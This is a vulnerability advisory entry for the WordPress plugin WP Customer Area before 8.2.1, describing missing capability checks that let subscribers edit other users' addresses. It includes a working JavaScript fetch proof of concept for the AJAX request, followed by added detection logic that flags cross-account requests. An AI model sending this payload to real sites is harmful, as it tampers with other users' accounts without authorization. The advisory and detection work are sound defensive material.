wpvulndb
Krzysztof Zając (CERT PL)
WPVDB-ID:9DEBE1EA-18AD-44C4-8078-68EB66D36C4A
Jan 10, 2024 - 12:00 a.m.

WP Customer Area < 8.2.1 - Subscriber+ Account Address Update

wpscan.com
wordpress
customer area
security vulnerability
ajax
account access

AI Score: 4.5
Confidence: High
EPSS: 0
Percentile: 14.0%

Description

The plugin does not properly validate users' capabilities in some of its AJAX actions, allowing malicious users to edit other users' account addresses.

PoC

You may get the nonce from your save address form.

```javascript
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": 'action=cuar_save_address_for_owner&cuar_nonce=a73a7eab3b&owner[type]=usr&owner[ids][]=1&address_id=home_address&address[name]=hohohohoh',
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})
  .then((response) => {
    return response.text();
  })
  .then((data) => {
    console.log(data);
  });
```
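Detection logic for the request shape in the PoC, added here as an example and not code from WPScan or the plugin: it flags `cuar_save_address_for_owner` requests whose `owner[ids]` values name a user other than the authenticated requester. The record fields (`userId`, `roles`, `body`), the sample records and the `trustedRoles` default are assumptions about what a body-logging proxy or WAF would provide.

```javascript
// Added example (not plugin or WPScan code). Record fields are assumptions.
const ACTION = "cuar_save_address_for_owner";
const OWNER_ID_KEY = /^owner\[ids\]\[\d*\]$/; // PHP accepts owner[ids][] and owner[ids][0]

// Constructed sample: POSTs to admin-ajax.php as a body-logging proxy might record them.
const SAMPLE_RECORDS = [
  { userId: 7, roles: ["subscriber"],
    body: "action=cuar_save_address_for_owner&owner[type]=usr&owner[ids][]=1&address_id=home_address" },
  { userId: 7, roles: ["subscriber"],
    body: "action=cuar_save_address_for_owner&owner[type]=usr&owner[ids][]=7&address_id=home_address" },
  { userId: 9, roles: ["subscriber"], // percent-encoded brackets and explicit indices
    body: "action=cuar_save_address_for_owner&owner%5Btype%5D=usr&owner%5Bids%5D%5B0%5D=1&owner%5Bids%5D%5B1%5D=9" },
  { userId: 1, roles: ["administrator"],
    body: "action=cuar_save_address_for_owner&owner[type]=usr&owner[ids][]=7&address_id=home_address" },
  { userId: 7, roles: ["subscriber"], body: "action=heartbeat&owner[ids][]=1" },
];

// Extract the target user ids from one urlencoded body, or null if it is another action.
function targetUserIds(body) {
  const params = new URLSearchParams(body); // decodes %5B / %5D before keys are matched
  if (params.get("action") !== ACTION || params.get("owner[type]") !== "usr") return null;
  const ids = [];
  for (const [key, value] of params) {
    if (OWNER_ID_KEY.test(key)) ids.push(Number.parseInt(value, 10));
  }
  return ids;
}

// Flag requests whose target ids include anyone other than the requester.
// Assumption: only roles in trustedRoles may legitimately edit another user's address.
function flagCrossAccountUpdates(records, trustedRoles = ["administrator"]) {
  const findings = [];
  for (const rec of records) {
    const ids = targetUserIds(rec.body);
    if (ids === null || rec.roles.some((r) => trustedRoles.includes(r))) continue;
    const foreign = ids.filter((id) => id !== rec.userId); // NaN never equals userId
    if (foreign.length > 0) findings.push({ userId: rec.userId, targetIds: foreign });
  }
  return findings;
}

console.log(flagCrossAccountUpdates(SAMPLE_RECORDS));
```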
